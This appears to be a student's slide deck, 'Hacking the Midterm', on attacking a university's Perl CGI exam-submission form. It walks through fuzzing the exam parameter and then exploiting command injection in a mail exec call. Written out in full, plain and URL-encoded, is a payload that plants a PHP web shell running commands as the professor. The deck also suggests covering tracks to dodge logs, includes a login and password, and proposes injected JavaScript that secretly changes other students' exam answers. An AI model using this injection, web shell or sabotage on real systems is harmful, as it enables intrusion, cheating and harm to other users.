For Profit Grades and Fun
Mike Gerschefske
HACKING THE MIDTERM
(Rev 2)
About Me
 UCCS – B. S. Computer Engineering ’05
 UCCS – M.E.I.A ever since
 Just need to finish project :(
 iCTF (International Cyber War Games)
 Going on 4th year with UCCS
 The MITRE Corporation
 Beautiful Girlfriend Kelly
 Interests in RE, etc.
Intro
 Actually hacked the Review
 Assume actual test just like review
 No source code
 Locked Down
 Already have read access to most things (shell access)
 Other people’s midterms, etc.
 Misc auth files
 Do we even need to hack it? Maybe … What’s out goal?
 http://cs.uccs.edu/~cs502/CS502M2008midterm.html
How does the midterm work?
 Fill out form and press Submit
 Username
 Password
 Answers
 Form checks credentials
 Save’s midterm to disk
 Emails midterm to Dr. Chow and User
The Midterm
On Submit
 Echo’s out everything submitted
 and at the bottom of the screen…
name=exam, value=CS502M2008midterm
class=CS502, year=2008, semester=M2008
term=midterm
open filename=CS502M2008Grade.txt
login incorrect!
What we do know
 Form is .cgi
 Probably Perl
 Form check’s authentication in file:
 CS502S2008Grade.txt
 /users/server/faculty/chow/public_html/cgibin/grade/CS502S2008Grade.txt
 Said so (in lesser words) on the web page
 Assumptions:
 Potentially grepping username file for valid credentials
 Probably using Perl’s open command
What we do know (cont.)
 Exams are saved here:
 .../public_html/cgi-
bin/grade/CS502/CS502M2008midterm/
 Exams saved in the format:
 exam_username_108_7_date
First Thought
 Probably doesn’t check input values from
CS502S2008Grade.txt
 Why would you, it’s trusted?
 Exploit the trusted
 If we could potentially change a username in there
might be able to exploit unchecked variables
 If a file is echo’ed out with unchecked names, we
could execute arbitrary system commands
Finding out more
 Just hitting Submit (Empty exam) posts the following:
 exam=CS502M2008midterm&name=&login=&passwd=&1d=&1e
1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assum
ptions=
 Why does it send: CS502M2008midterm?
 Probably written to be generic
 Returns:




name=exam, value=CS502M2008midterm
class=CS502, year=2008, semester=M2008 term=midterm
open filename=CS502M2008Grade.txt
login incorrect!
Modifying Requests
 Empty exam omitting CS502M2008midterm :
 exam=CS502M2008midterm&name=&login=&passwd=&1
d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=
&5b=&assumptions=
 Sending no exam parameter
 Change to exam=&name=&login=…
 Returns




name=exam, value=
class=, year=, semester= term=
open filename=Grade.txt
login incorrect!
Modifying Requests (cont.)
 Send the following (fuzzing)
 exam=abcdefghicjklmnopqrstuvwxyz&name=&login=&passwd
=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5
b=&assumptions=
 Returns
 name=exam, value=abcdefghicjklmnopqrstuvwxyz
 class=abcde, year=ghic, semester=fghic
term=jklmnopqrstuvwxyz
 open filename=abcdefghicGrade.txt
 login incorrect!
 Assumptions
 First 10 letters of exam is appended to Grade.txt authentication
file
 10 letters is not a lot to work with
 Probably does a split of exam[1..10]
*Grade.txt
 First thought, try to change location of Grade.txt
 If we control it, we control potentially unchecked input
 Assumptions
 Probably issuing the following command
 open “~chow/…/” + $10char + Grade.txt
 This would prevent from using /tmp because of the
leading file path
 /tmp/abcGrade.txt
 This may be an avenue but found other solution
so stopped pursuing this
Split Exam Input Value into
two Parameters
 Exam value appears somewhere else
 ../ public_html/cgi-
bin/grade/CS502/CS502M2008midterm/*exams
 First 10 character CS502M2008 appended to
Grade.txt
 CS502M2008Grade.txt
 Why do we upload the entire string
CS502M2008midterm???
CS502M2008midterm
 Since CS502M2008 is used for authentication we
should leave this alone
 Let’s modify midterm and see what it does…
 Change exam=CS502M2008midterm to
exam=CS502M2008blah
 Unauthenticated it creates a directory:
../ public_html/cgi-bin/grade/CS502/CS502M2008blah
 Authenticated it creates a directory CS502M2008blah
and writes out exam and then emails
 Don’t think I actually ever did this authenticated
If Authenticated
 If folder for this midterm doesn’t exist, create it
 Upload Exam to folder
 Email Out copy to Dr. Chow and me
 Assumptions
 Code maybe calls a mkdir or users perl to create the
directory
 Probably uses perl to write out the file
 Probably not writing socket code to do a SMTP call
Email Out
 How does this work?
Email Out
 Probably something like this:
 exec(
mail -s exam chow@chow.edu $user@uccs.edu <
$dir_to_exam/$exam
)
 Probably doesn’t check the $dir_to_exam
 Why would a directory name contain malicious content?
 Can’t change $exam ($exam ~= $user_name) and we
can’t change $user_name w/o modifying *Grade.txt
 But we can modify $dir_to_exam!!!!
 Our fuzzing even showed it could be any length
Authenticated vs.
Unauthenticated
 Regardless of authentication a directory is
created
 Creating directories doesn’t do very much for
us
 Only if authenticated with it run the mail
program command
Execute My Command
 Modify the following:
 exam=CS502M2008midterm&name=&login=&passwd
=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b
1=&5a=&5b=&assumptions=
 To:
 exam=CS502M2008COMMAND&login=_LOGIN_&pas
swd=_PASSWD_
 Note: if we don’t login correctly, the mail program
won’t get executed
 By keeping CS502M2008 the system will use
CS502M2008Grade.txt to authenticate us
 We (I) have (had) a username in this file
New Request
 Need help encoding URLs:
 http://www.w3schools.com/TAGS/ref_urlencode.asp
 Let’s upload the following command:
 & echo "<?php exec(\$_GET['command']); ?>" > a.php
&
 %26+echo+%22%3C%3Fphp+exec%28%5C%24%5FG
ET%5B%27command%27%5D%29%3B+%3F%3E%22
+%3E+a%2Ephp+%26
 exam=CS502M2008%26+echo+%22%3C%3Fphp+exec%
28%5C%24%5FGET%5B%27command%27%5D%29%3B
+%3F%3E%22+%3E+a%2Ephp+%26&login=mgersch2&p
asswd=111-22-3333
Last Request
 exam=CS502M2008%26+echo+%22%3C%3Fphp+ex
ec%28%5C%24%5FGET%5B%27command%27%5D
%29%3B+%3F%3E%22+%3E+a%2Ephp+%26&login
=mgersch2&passwd=111-22-3333
 Creates a directory called:
 CS502M2008& echo "<?php
exec(\$_GET['command']); ?>" > a.php &
Mail Program
 Assumption
 exec(
mail -s exam chow@chow.edu $user@uccs.edu <
$dir_to_exam/$exam )
 Is now turned into:
 exec(
mail -s exam chow@chow.edu $user@uccs.edu < &
\
echo "<?php exec( $_GET['command']); ?>" > a.php &
/$exam )
 Successfully create …/grade/a.php that takes
commands and runs them as Dr. Chow
Conclusions
 Consequently, this hack appears to never send out an email
– Dr. Chow is never notified that it was hacked
 Or does it? It doesn’t, verified.
 Logs usually only show GETs, not POSTs
 Clean up directories we’ve create and we’ve covered our tracks
 Using the a.php to upload commands uses GETs.
 Everything is probably logged there
 Can easily change this to POSTs
 Probably a wise idea to secure anything that remotely looks
like a production system.
Backups
Evil Things to Do
 Average test may take ~30+Minutes
 Injecting JS that every 5-10 minutes, picks a
multiple choice question and changes the
answer
 Slow enough which people may not notice the change
 If the user prints out a copy, hard copy will be wrong
too
 Goal: Lower everyone else's test scores by some
reasonable amount to put yourself at the top of
the curve
IDS
 IDS probably could not have stopped this
 Least not initially
 This is a security test therefore answers that
would normally be acceptable, IDS might
throw away
 i.e. how would you hack this site